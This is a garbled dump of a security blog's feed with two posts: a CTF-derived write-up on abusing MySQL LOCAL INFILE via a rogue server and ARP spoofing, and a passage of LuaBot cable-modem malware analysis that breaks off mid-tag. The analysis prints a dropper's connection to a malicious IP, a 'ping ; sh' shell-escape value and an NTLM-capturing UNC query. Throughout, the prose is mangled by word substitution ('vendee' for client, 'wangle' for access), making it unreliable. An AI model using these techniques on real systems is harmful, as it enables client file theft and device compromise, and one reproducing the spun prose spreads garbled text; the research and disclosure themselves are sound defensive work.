w00tsec.blogspot.com - Posts (Atom)

w00tsec

W00tsec.blogspot.com Spined HTML

tag:blogger.com,1999:blog-32964711080826938382018-09-23T15:02:20.880-03:00w00tsecembedded device &amp; webapp hackingBernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.comBlogger21125tag:blogger.com,1999:blog-3296471108082693838.post-89663764841034530882018-04-23T10:27:00.000-03:002018-04-23T16:10:10.393-03:00Abusing MySQL LOCAL INFILE to read vendee filesRecently, I was playing the <a href="https://ctftime.org/event/539/tasks/">VolgaCTF 2018 CTF</a> with my teammates from <a href="https://twitter.com/thegooniesctf">TheGoonies</a>&nbsp;and we came wideness an interesting Web rencontre that we didn't manage to solve during the competition. The pursuit day, I read the <a href="https://github.com/balsn/ctf_writeup/tree/master/20180324-volgactf#corp-monitoring-unsolved-written-by-bookgin-special-thanks-to-admin-aleksey">write-up</a>&nbsp;and learned a tomfool technique to wade the MySQL vendee directly via the&nbsp;LOAD DATA INFILE statement.<br /><br />The "<a href="https://ctftime.org/task/5642">Corp Monitoring</a>" task consisted of a Corporate Monitoring API that would test the healthcheck of a given server by connecting and verifying if the FTP, Web and MySQL servers were up. The MySQL user for the connection was restricted and the healthcheck validation was based on a few queries including the "SHOW DATABASE" command.<br /><span style="text-align: center;"><br /></span><span style="text-align: center;">The key to solve the rencontre was to identify the "Can Use LOAD DATA LOCAL" vendee sufficiency and point the API to a Rogue MySQL server that would read wrong-headed files from the vendee via LOAD DATA INFILE statements.</span><br /><br />After reading well-nigh the technique, I decided to trammels how several libraries, clients and Web Frameworks could be exploited. I moreover ended up writing a a Bettercap module to vituperate this full-length in combination with MITM attacks.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-js0uaqfam5c/Wtt2yfF3sbI/AAAAAAAAB0A/uY6pdVKBQpQfxhkRFJD5D7B1SqZL1r_sgCEwYBhgL/s1600/bettercap-mysql.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1114" data-original-width="1118" height="317" src="https://2.bp.blogspot.com/-js0uaqfam5c/Wtt2yfF3sbI/AAAAAAAAB0A/uY6pdVKBQpQfxhkRFJD5D7B1SqZL1r_sgCEwYBhgL/s320/bettercap-mysql.png" width="320" /></a></div><br /><br /><b style="text-align: center;">Previous Research</b><br /><b style="text-align: center;"><br /></b>SurpassingI start I would like to point that this technique is not new: it's a <a href="https://dev.mysql.com/doc/refman/5.7/en/load-data.html">known and documented feature</a> from the MySQL clients. I gathered prior posts, tools and presentations and they're all written by Russians - it looks like these techniques are not very widespread outside there.<br /><br />- <a href="https://www.slideshare.net/qqlan/database-honeypot-by-design-25195927">Database Honeypot by design</a>&nbsp;- Presentation from Yuri Goltsev (August 2013)<br />-&nbsp;<a href="https://github.com/allyshka/Rogue-MySql-Server">Rogue-MySql-Server Tool</a>:&nbsp;MySQL fake server to read files of unfluctuating clients (September 2013)<br />-&nbsp;<a href="http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/">MySQL connect file read</a>&nbsp;- Post from the Russian Security (April 2016)<br /><br /><br /><b>Revisiting MySQL LOAD DATA INFILE</b><br /><br />According to the <a href="https://dev.mysql.com/doc/internals/en/connection-phase.html">MySQL documentation</a>, the handshake connection phase performs the pursuit tasks:<br /><br />- Exchange the capabilities of vendee and server<br />- Setup SSL liaison waterworks if requested<br />-Demonstratethe vendee versus the server<br /><br />After the successful authentication, the vendee sends the query and waits for the server response surpassing unquestionably doing something. The "Client Capabilities" packet includes an entry tabbed "Can Use LOAD DATA LOCAL".<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-ptmu6rm8b-M/WtONkG3X0AI/AAAAAAAABys/M588eb_SZGU_A9cAY2PAkohWQ_Kh8YJ_gCPcBGAYYCw/s1600/conn.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1182" data-original-width="1386" height="340" src="https://4.bp.blogspot.com/-ptmu6rm8b-M/WtONkG3X0AI/AAAAAAAABys/M588eb_SZGU_A9cAY2PAkohWQ_Kh8YJ_gCPcBGAYYCw/s400/conn.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">LOAD DATA LOCAL Set? You're gonna have a bad time.</td></tr></tbody></table><br />This is where things start to wilt interesting. As long as the vendee enables the sufficiency (via --enable-local-infile flag, for example), the file will be read from the local machine running the MySQL vendee and transferred to the server.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-Qb9inDGJ6fo/WttrbGYF0iI/AAAAAAAABzE/-vjmgcnMz5wxXlmVWS924GGccIleZ98LwCLcBGAs/s1600/Screen%2BShot%2B2018-04-21%2Bat%2B18.48.13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="666" data-original-width="1140" height="231" src="https://2.bp.blogspot.com/-Qb9inDGJ6fo/WttrbGYF0iI/AAAAAAAABzE/-vjmgcnMz5wxXlmVWS924GGccIleZ98LwCLcBGAs/s400/Screen%2BShot%2B2018-04-21%2Bat%2B18.48.13.png" width="400" /></a></div><br /><div>One particular full-length from the MySQL protocol is that the vendee simply doesn't alimony track of the requested commands, executing the queries purely based on the server response.</div><div><br /></div><div>This ways that a rogue MySQL server can simulate the initial handshake, wait for the SQL statement packet, ignore it and respond with a LOCAL DATA INFILE request.Tomfoolisn't it?<br /><br />For successfully exploitation we moreover need the vendee to make at least one query to our Rogue MySQL server. Fortunately, most MySQL clients and libraries make at least one query without the handshake in order to fingerprint the platform, for example (select @@version_comment limit 1).</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-4kwar7tMi3A/WttyYF6zOsI/AAAAAAAABzs/Byc0eQ5WMLouvdca_RnVDj3pCSGsknlIgCEwYBhgL/s1600/Screen%2BShot%2B2018-04-21%2Bat%2B18.32.18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1156" data-original-width="1600" height="287" src="https://3.bp.blogspot.com/-4kwar7tMi3A/WttyYF6zOsI/AAAAAAAABzs/Byc0eQ5WMLouvdca_RnVDj3pCSGsknlIgCEwYBhgL/s400/Screen%2BShot%2B2018-04-21%2Bat%2B18.32.18.png" width="400" /></a></div><div><br /></div><div><br /></div><div>Because most MySQL clients don't enforce encryption, it's quite easy to impersonate a MySQL server using tools like <a href="https://github.com/bettercap/bettercap">Bettercap</a>. They simply don't superintendency well-nigh the integrity and authenticity of the communication.<br /><br /><br /><b>MITM + Bettercap + Rogue MySQL Server = WIN</b><br /><br /><a href="https://github.com/bettercap/bettercap">Bettercap</a>&nbsp;is the Swiss unwashed pocketknife for network attacks and monitoring. It supports&nbsp;<a href="https://github.com/bettercap/bettercap/tree/master/modules">several modules</a>&nbsp;for ARP/DNS spoofing, TCP and packet proxy etc. I had a quick squint on how its modules work and hacked a simple MySQL server that will vituperate the LOAD DATA LOCAL INFILE full-length to read vendee files.<br /><span style="text-align: center;"><br /></span><span style="text-align: center;">Firstly, I sniffed the MySQL traffic while the vendee connects and request to read a LOCAL INFILE. I exported the server responses as byte arrays and specified the components in the Golang code:</span><br /><span style="text-align: center;"><br /></span><span style="text-align: center;"><script src="https://gist.github.com/bmaia/14e267c984fb88f0a5282d06a7f73e27.js"></script></span><br /><span style="text-align: center;">Writing a module for Bettercap is very simple and the cadre of the Rogue MySQL server is as follows:</span><br /><br /><script src="https://gist.github.com/bmaia/adc503231ffff19a77aaf0c7abd2e895.js"></script> Here's the module in action:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-Mu67bygMnvk/Wtt4yGTQWPI/AAAAAAAAB0I/qsOQUvaBr50-pBL4Yte8FvQim-rzWc5bQCLcBGAs/s1600/bettarcapz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1278" data-original-width="1586" height="514" src="https://2.bp.blogspot.com/-Mu67bygMnvk/Wtt4yGTQWPI/AAAAAAAAB0I/qsOQUvaBr50-pBL4Yte8FvQim-rzWc5bQCLcBGAs/s640/bettarcapz.png" width="640" /></a></div><br /><br />The module includes the pursuit options:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-RdtKIpaj0Fc/Wtt55BtgYiI/AAAAAAAAB0U/mKumX0OyuJsX9pAXBs2ACZups0bvlvtSwCLcBGAs/s1600/Screen%2BShot%2B2018-04-21%2Bat%2B19.49.48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="598" data-original-width="1238" height="304" src="https://3.bp.blogspot.com/-RdtKIpaj0Fc/Wtt55BtgYiI/AAAAAAAAB0U/mKumX0OyuJsX9pAXBs2ACZups0bvlvtSwCLcBGAs/s640/Screen%2BShot%2B2018-04-21%2Bat%2B19.49.48.png" width="640" /></a></div><br /><br />It's worth mentioning that the INFILE format moreover supports UNC paths. If the vendee connecting to your rogue MySQL server is running on Windows, it's moreover possible to retrieve net-NTLM hashes, using the query below:<br /><br /><div class="code">LOAD DATA LOCAL INFILE '\\\\172.16.136.153\\test' into table mysql.test FIELDS TERMINATED BY "\n";</div><br />Here's a quick video illustrating this technique:<br /><br /><iframe allow="autoplay; encrypted-media" allowfullscreen="" frameborder="0" height="400" src="https://www.youtube.com/embed/3HVW-toqfCM" width="660"></iframe><br />If you have a privileged network position and perform DNS or ARP spoofing, you can moreover redirect the MySQL traffic from legit databases to your rogue server and read wrong-headed vendee files.<br /><br />As far as I know, it's not possible to simply redirect TCP traffic from Host A to Host B using Bettercap. I wrote a quick and dirty hack for <a href="https://github.com/bettercap/bettercap/blob/master/modules/tcp_proxy.go">tcp_proxy.go</a> to handle that:<br /><br /><script src="https://gist.github.com/bmaia/73f796e970e8eb9e7cd846620bba58b4.js"></script> Here's the ARP spoofing and the MySQL LOAD DATA LOCAL INFILE in action:<br /><br /><iframe allow="autoplay; encrypted-media" allowfullscreen="" frameborder="0" height="400" src="https://www.youtube.com/embed/kHR5dd0qVG4" width="660"></iframe> <br /><br />I sent a pull request to the project with the Rogue MySQL Server, let's hope that <a href="https://twitter.com/evilsocket">@evilsocket</a>&nbsp;accept it. If my pull request is accepted, I will moreover ask them the weightier way to redirect TCP traffic (maybe flipside module or a setting for the TCP Proxy). I will update the post with the upcoming official solution.<br /><br /><br /><b>MySQL Command-Line Clients</b></div><div><b><br /></b></div><div>The mysql vendee from Homebrew/macOS (mysql: stable 5.7.21, devel 8.0.4-rc) properly enforces the LOCAL-INFILE flag and won't let you read vendee files without explicitly enabling it:</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-gaHfGdLyQo8/WtttmBaFKtI/AAAAAAAABzQ/Gc0Qahd0zDQcIrMklLYs7yP0Shk7omPrQCLcBGAs/s1600/Screen%2BShot%2B2018-04-21%2Bat%2B18.57.46.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="258" data-original-width="1140" height="144" src="https://1.bp.blogspot.com/-gaHfGdLyQo8/WtttmBaFKtI/AAAAAAAABzQ/Gc0Qahd0zDQcIrMklLYs7yP0Shk7omPrQCLcBGAs/s640/Screen%2BShot%2B2018-04-21%2Bat%2B18.57.46.png" width="640" /></a></div><div><br /></div><div>For some reason, several clients like the Ubuntu default mysql-client (5.7.21-0ubuntu0.17.10.1, as of this writing) automatically sets that flag during the connection:</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-V2qEHRlfR64/WttuxjZ_BnI/AAAAAAAABzc/XJuIMthokwUw42rEg4QTqLVV7KDTYZ06gCLcBGAs/s1600/Screenshot%2Bat%2B2018-04-21%2B19-02-33.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="346" data-original-width="738" height="300" src="https://3.bp.blogspot.com/-V2qEHRlfR64/WttuxjZ_BnI/AAAAAAAABzc/XJuIMthokwUw42rEg4QTqLVV7KDTYZ06gCLcBGAs/s640/Screenshot%2Bat%2B2018-04-21%2B19-02-33.png" width="640" /></a></div><div><br /></div><div>The same happens with the Windows vendee bundled with MySQL Workbench, there's no need to enable the flags to read local files:</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-YyTnG53w8Cw/WtuC1R8OgTI/AAAAAAAAB0k/lc0GNlGcRZwvLhBAA5FoayvkQcn5vOolgCLcBGAs/s1600/mysqlwin.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="342" data-original-width="677" height="322" src="https://4.bp.blogspot.com/-YyTnG53w8Cw/WtuC1R8OgTI/AAAAAAAAB0k/lc0GNlGcRZwvLhBAA5FoayvkQcn5vOolgCLcBGAs/s640/mysqlwin.PNG" width="640" /></a></div><div><br /></div><div><br /></div><b>Abusing Web Frameworks to read server files</b><br /><br /><div>This insecure by default policies moreover occurs in several libraries, Frameworks and MySQL connectors out there: most of them enable to LOCAL-INFILE flag by default. In this case, when a Web-user modify a form containing a MySQL host and point it to a rogue server, he can read local files from the system.<br /><br />This functionality is very worldwide in Monitoring/Dashboard applications and Framework install scripts, that indulge the user to set the database on-the-fly via the admin panel.</div><div><br /></div>The good news here is that most Web-applications restrict the panels for waffly MySQL settings to zookeeper users only. The bad news is that your admin is one XSS/CSRF/Clickjacking yonder from stuff exploited. Here's a quick overview on how some PHP frameworks can be abused:<br /><br /><br /><ul><li><b>Joomla v3.8.7</b></li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-PdXG1liJH3I/WtxQbrUAoFI/AAAAAAAAB00/OsXRteDQSo00p-YQz0takv5go8vq80t4ACLcBGAs/s1600/joomla.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1069" data-original-width="1600" height="426" src="https://1.bp.blogspot.com/-PdXG1liJH3I/WtxQbrUAoFI/AAAAAAAAB00/OsXRteDQSo00p-YQz0takv5go8vq80t4ACLcBGAs/s640/joomla.png" width="640" /></a></div><br /><br /><ul><li><b>Wordpress v4.9.5</b></li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-ShdPDHxNogM/WtxQy7OfU0I/AAAAAAAAB08/PBGGUOK-vw8qXMVNFCg3B7lVlgcFtG9MgCLcBGAs/s1600/wordpress.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="990" data-original-width="1600" height="394" src="https://1.bp.blogspot.com/-ShdPDHxNogM/WtxQy7OfU0I/AAAAAAAAB08/PBGGUOK-vw8qXMVNFCg3B7lVlgcFtG9MgCLcBGAs/s640/wordpress.png" width="640" /></a></div><br /><br /><ul><li><b>Zabbix v3.4.8</b></li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-VeqwvxOZAQs/WtxRA2A2AkI/AAAAAAAAB1A/jto7c-IIqz4lzOyFCOIcyWK-f_pwax6EQCLcBGAs/s1600/zabbix.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1165" data-original-width="1600" height="466" src="https://1.bp.blogspot.com/-VeqwvxOZAQs/WtxRA2A2AkI/AAAAAAAAB1A/jto7c-IIqz4lzOyFCOIcyWK-f_pwax6EQCLcBGAs/s640/zabbix.png" width="640" /></a></div><div><br /></div><br /><br /><ul><li><b>Drupal v8.5.2 </b>(Not vulnerable)</li></ul><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-ndMOXK38s7Y/WtxRGqUaboI/AAAAAAAAB1I/OR_8rePXrnoCBAnQ1TBHEfhQNq0x2b52wCLcBGAs/s1600/drupal.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1143" data-original-width="1600" height="456" src="https://1.bp.blogspot.com/-ndMOXK38s7Y/WtxRGqUaboI/AAAAAAAAB1I/OR_8rePXrnoCBAnQ1TBHEfhQNq0x2b52wCLcBGAs/s640/drupal.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Drupal was probably too rented stuff vulnerable to RCEs</td></tr></tbody></table><br /><br /><b>Bonus: Abusing Excel MySQL Connector</b><br /><br />If you have a Microsoft Office installation on your Windows machine and the&nbsp;<a href="https://dev.mysql.com/downloads/connector/net/">MySQL Connector/Net</a> is installed, it's possible to create a spreadsheet that connects to a rogue MySQL server. The connector is installed by default with the <a href="https://dev.mysql.com/downloads/installer/">Windows MySQL installer</a>&nbsp;and you probably have it if you use a tool to connect/manage MySQL databases or if your machine is running MySQL server.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-oubVBBd4qFc/WtyS_qeoC3I/AAAAAAAAB1s/0XLe0QwgF0kjWaWouJvu0FM52J1B0Yu4gCLcBGAs/s1600/mysql-install.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="599" data-original-width="800" height="298" src="https://3.bp.blogspot.com/-oubVBBd4qFc/WtyS_qeoC3I/AAAAAAAAB1s/0XLe0QwgF0kjWaWouJvu0FM52J1B0Yu4gCLcBGAs/s400/mysql-install.PNG" width="400" /></a></div><br />In order to create a document that connects to a MySQL server, we need to go to the Data tab, segregate New Query&gt;From Database&gt;From MySQL Database. We enter the server details, username, password, query and save the file.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-s8TjIM2kJ9o/WtyTYKVwpGI/AAAAAAAAB10/F2o_we9KP8M1YmNBIb4yJ6IIhPKL5bIuQCLcBGAs/s1600/mysql-excel.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1013" data-original-width="1022" height="395" src="https://3.bp.blogspot.com/-s8TjIM2kJ9o/WtyTYKVwpGI/AAAAAAAAB10/F2o_we9KP8M1YmNBIb4yJ6IIhPKL5bIuQCLcBGAs/s400/mysql-excel.png" width="400" /></a></div><br /><br />If you download the document from the Internet, the receiver needs to put the document in editing mode surpassing the remote server will be contacted. For some reason, we need to close/reopen Excel for the query to work. Also, Excel only displays the security warning during the first time you unshut the file and stops to do so as soon as you enable the external content.<br /><br />Here's flipside demo:<br /><br /><iframe allow="autoplay; encrypted-media" allowfullscreen="" frameborder="0" height="400" src="https://www.youtube.com/embed/iBGbHYJAXSg" width="660"></iframe> <br /><br /><b><br /></b><b>Conclusion</b><br /><br />Despite the efforts from Duo Security (they had a website AND a logo) with the <a href="https://duo.com/blog/backronym-mysql-vulnerability">BACKRONYM MySQL vulnerability</a>, not much is stuff washed-up to enforce proper encryption to MySQL servers. Web applications and Frameworks rarely support encryption and TLS validation for the MySQL connection.&nbsp;<span style="text-align: center;">The unencrypted protocol is not secure and, given a password hash and a&nbsp;</span>successful hallmark handshake, one can <a href="https://github.com/cyrus-and/mysql-unsha1">successfully login on the server</a>.<br /><br />MySQL libraries and connectors should establish secure patterns and disable LOCAL-INFILE support by default. I really like the way the&nbsp;<a href="https://github.com/go-sql-driver/mysql">Go MySQL Driver</a>&nbsp;works: it supports LOCAL-INFILE via whitelisting and the library documentation explicitly advises that the full-length "Might be insecure!"<br /><div><br /></div><div>This full-length can moreover be longwinded in honeypots and vulnerability scanners. It should be quite interesting to pwn security tools while they scan your MySQL host. If your using register a MySQL URI handler, your system might be venal via website links.<br /><span style="text-align: center;"><br /></span><span style="text-align: center;">Another interesting way to vituperate MySQL clients is via downgrade attacks, switching to older insecure password hallmark and verifying how they behave. But this post is once too long for that...</span><br /><span style="text-align: center;"><br /></span><span style="text-align: center;">Thanks for reading!&nbsp;</span><br /><span style="text-align: center;"><br /></span></div><br />Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com0tag:blogger.com,1999:blog-3296471108082693838.post-48604607850491979102016-09-12T12:08:00.000-03:002016-12-01T18:15:55.586-02:00LuaBot: Malware targeting subscription modems<span style="font-family: inherit;">During mid-2015 I disclosed some vulnerabilities well-expressed multiple ARRIS subscription modems. I wrote a <a href="https://w00tsec.blogspot.com/2015/11/arris-cable-modem-has-backdoor-in.html">blogpost well-nigh ARRIS' nested backdoor</a> and detailed some of my subscription modem research during the 2015 edition from&nbsp;<a href="https://www.nullbyte-con.org/">NullByte Security Conference</a>.</span><br /><span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">CERT/CC released the Vulnerability Note&nbsp;<a href="https://www.kb.cert.org/vuls/id/419568">VU#419568</a> and it got <a href="http://www.theregister.co.uk/2015/11/20/arris_modem_backdoor/">lots</a> <a href="http://news.softpedia.com/news/backdoor-within-backdoor-puts-over-600-000-arris-cable-modems-in-danger-496485.shtml">of</a> <a href="https://hardware.slashdot.org/story/15/11/21/0428215/600000-arris-cable-modems-have-backdoors-in-backdoors-researcher-claims">media</a> <a href="http://www.tomshardware.com/news/double-backdoor-arris-cable-modems,30620.html">coverage</a>. I did not provide any POC's during that time considering I was pretty sure that those vulnerabilities were hands wormable... And guess what? Someone is urgently exploiting those devices since May/2016.</span><br /><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;">The malware targets&nbsp;<a href="https://www-ssl.intel.com/content/www/us/en/cable-modems/puma5-product-brief.html">Puma 5</a>&nbsp;(ARM/Big Endian) subscription modems, including the ARRIS TG862 family. The infection happens in multiple stages and the dropper is very similar to many <a href="https://www.protectwise.com/blog/observing-large-scale-router-exploit-attempts/">common worm</a> that <a href="https://quantumfilament.co/2015/08/17/chapter-2-the-binary/">targets embedded devices</a> from <a href="https://isc.sans.edu/diary/19999">multiple architectures</a>. The final stage is an ARMEB version from the <a href="https://www.symantec.com/security_response/writeup.jsp?docid=2016-090915-3236-99">LuaBot Malware</a>.</span><br /><span style="font-family: inherit;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-Wn1TgurUOU8/V5ORms_wmZI/AAAAAAAABWY/tl90mO54ZA8z_diNrUWXrrfMMiVr0KDDwCEw/s1600/ps.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" height="227" src="https://4.bp.blogspot.com/-Wn1TgurUOU8/V5ORms_wmZI/AAAAAAAABWY/tl90mO54ZA8z_diNrUWXrrfMMiVr0KDDwCEw/s400/ps.png" width="400" /></span></a></div><div><br />The ARMEL version from the LuaBot Malware was dissected on a <a href="http://blog.malwaremustdie.org/2016/09/mmd-0057-2016-new-elf-botnet-linuxluabot.html">blogpost from Malware Must Die</a>, but this specific ARMEB was still unknown/undetected for the time being. The malware was initially sent to VirusTotal on 2016-05-26 and it still has a 0/0 detection rate.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-pTtamdU0Wrg/V9SGapor_QI/AAAAAAAABdA/i_mrqfy39PwX8sJjUm9vYBRmjCEOeLVPACLcB/s1600/vtotal.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="337" src="https://4.bp.blogspot.com/-pTtamdU0Wrg/V9SGapor_QI/AAAAAAAABdA/i_mrqfy39PwX8sJjUm9vYBRmjCEOeLVPACLcB/s400/vtotal.PNG" width="400" /></a></div><br /><br /></div><div><div><b><span style="font-family: inherit;">Cable Modem Security and ARRIS Backdoors</span></b></div><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;">Before we go any further, if you want to learn well-nigh subscription modem security, grab the slides from my talk "HackingSubscriptionModems: The Later Years". The talk covers many aspects of the technology used to manage subscription modems, how the data is protected, how the ISPs upgrade the firmwares and so on.</span></div><div><span style="font-family: inherit;"><br /></span></div><div><ul><li><span style="font-family: inherit;"><a href="https://github.com/bmaia/slides/raw/master/nullbyte_2015-hacking_cable_modems_the_later_years.pdf">https://github.com/bmaia/slides/raw/master/nullbyte_2015-hacking_cable_modems_the_later_years.pdf</a></span></li></ul></div><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;">Pay special sustentation to the slide #86:</span></div><div><span style="font-family: inherit;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-JDXpkrYtVIo/V5MM7hiZjSI/AAAAAAAABV0/Jzro5XkvSG896etFaen8wy2QNXKevrMpACLcB/s1600/myths.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" height="260" src="https://1.bp.blogspot.com/-JDXpkrYtVIo/V5MM7hiZjSI/AAAAAAAABV0/Jzro5XkvSG896etFaen8wy2QNXKevrMpACLcB/s320/myths.PNG" width="320" /></span></a></div><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;">I received some reports that malware creators are remotely exploiting those devices in order to dump the modem's configuration and steal private certificates. Some users moreover reported that those certificates are stuff sold for bitcoin to modem cloners all virtually the world. The report from <a href="http://blog.malwaremustdie.org/2016/09/mmd-0057-2016-new-elf-botnet-linuxluabot.html">Malware Must Die!</a>&nbsp;also points that the LuaBot is stuff used for flooding/DDoS attacks.</span></div><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;"><br /></span></div><div><b><span style="font-family: inherit;">Exploit and Initial Infection</span></b></div><div><b><span style="font-family: inherit;"><br /></span></b></div><div><span style="font-family: inherit;">Luabot malware is part of a worthier botnet targeting embedded devices from multiple architectures.Withoutverifying some infected systems, I noticed that most subscription modems were compromised by a writ injection in the restricted CLI wieldy via the ARRIS Password of The Day Backdoor.</span></div><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;">Telnet honeypots like the one from&nbsp;<a href="http://www.nothink.org/honeypot_telnet.php">nothink.org</a> have been logging these exploit attempts for some time.&nbsp;</span>They are logging many attempts to bruteforce the username "system" and the password "ping ; sh", but they're, in fact, commands used to escape from the restricted ARRIS telnet shell.</div><div><span style="font-family: inherit;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-DWytLE0AsEQ/V5QcHTuwvOI/AAAAAAAABXY/H72vWoBt0FIJIAoXJAK0D9ZBFCIx5o90gCLcB/s1600/top-honeypot.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" height="320" src="https://2.bp.blogspot.com/-DWytLE0AsEQ/V5QcHTuwvOI/AAAAAAAABXY/H72vWoBt0FIJIAoXJAK0D9ZBFCIx5o90gCLcB/s320/top-honeypot.PNG" width="294" /></span></a></div><div><br /></div><div><span style="font-family: inherit;">The initial dropper is created by echoing shell commands to the terminal to create a standard ARM ELF.</span></div><div><span style="font-family: inherit;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-9NrPnroOPS0/V5Odxuo5cHI/AAAAAAAABW8/WosvOLpOC4oA0dyXFKwcLwDT6VA3Rz6hwCLcB/s1600/dropper.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" height="251" src="https://3.bp.blogspot.com/-9NrPnroOPS0/V5Odxuo5cHI/AAAAAAAABW8/WosvOLpOC4oA0dyXFKwcLwDT6VA3Rz6hwCLcB/s640/dropper.png" width="640" /></span></a></div><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;">I have navigate compiled and uploaded a few debugging tools to my&nbsp;<a href="https://github.com/bmaia/cross-utils/tree/master/armeb">cross-utils</a>&nbsp;repository, including <a href="https://github.com/bmaia/cross-utils/tree/master/armeb/gdb">gdbserver</a>, <a href="https://github.com/bmaia/cross-utils/tree/master/armeb/strace">strace</a> and <a href="https://github.com/bmaia/cross-utils/tree/master/armeb/tcpdump">tcpdump</a>. I moreover happen to have a vulnerable ARRIS TG862 so I can perform dynamic wringer in a controlled environment.</span><br /><span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">If you run the dropper using strace to monitor the network syscalls, you can see the initial connection attempt:</span><span style="font-family: inherit;"><br /></span><br /><div class="code">./strace -v -s 9999 -e poll,select,connect,recvfrom,sendto -o network.txt ./mw/drop</div><div class="code">connect(6, {sa_family=AF_INET, sin_port=htons(4446), sin_addr=inet_addr("46.148.18.122")}, 16) = -1 ENODEV (No such device) </div><span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">The writ is a simple download and exec ARMEB shellcode. The malicious IP 46.148.18.122 is known for </span><a href="https://www.abuseipdb.com/check/46.148.18.122" style="font-family: inherit;">bruteforcing SSH servers and trying to exploit Linksys router writ injections</a><span style="font-family: inherit;"> in the wild.Withoutdownloading the second stage malware, the script will reverberate the pursuit string:</span><br /><div class="code">echo -e 61\\\\\\x30ck3r </div><span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">This pattern is particularly interesting considering it is quite similar to the one reported by ProtectWise while&nbsp;</span><a href="https://www.protectwise.com/blog/observing-large-scale-router-exploit-attempts/" style="font-family: inherit;">Observing Large-Scale Router Exploit Attempts</a><span style="font-family: inherit;">:</span><br /><div class="code">cmd=cd /var/tmp &amp;&amp; reverberate -ne \\x3610cker &gt; 610cker.txt &amp;&amp; cat 610cker.txt </div><span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">The second stage binary ".nttpd" (MD5 c867d00e4ed65a4ae91ee65ee00271c7) performs some internal checks and creates iptables rules&nbsp;</span>allowing remote wangle from very specific subnets and&nbsp;<span style="font-family: inherit;">blocking external wangle to ports 8080, 80, 433, 23 and 22:</span></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a 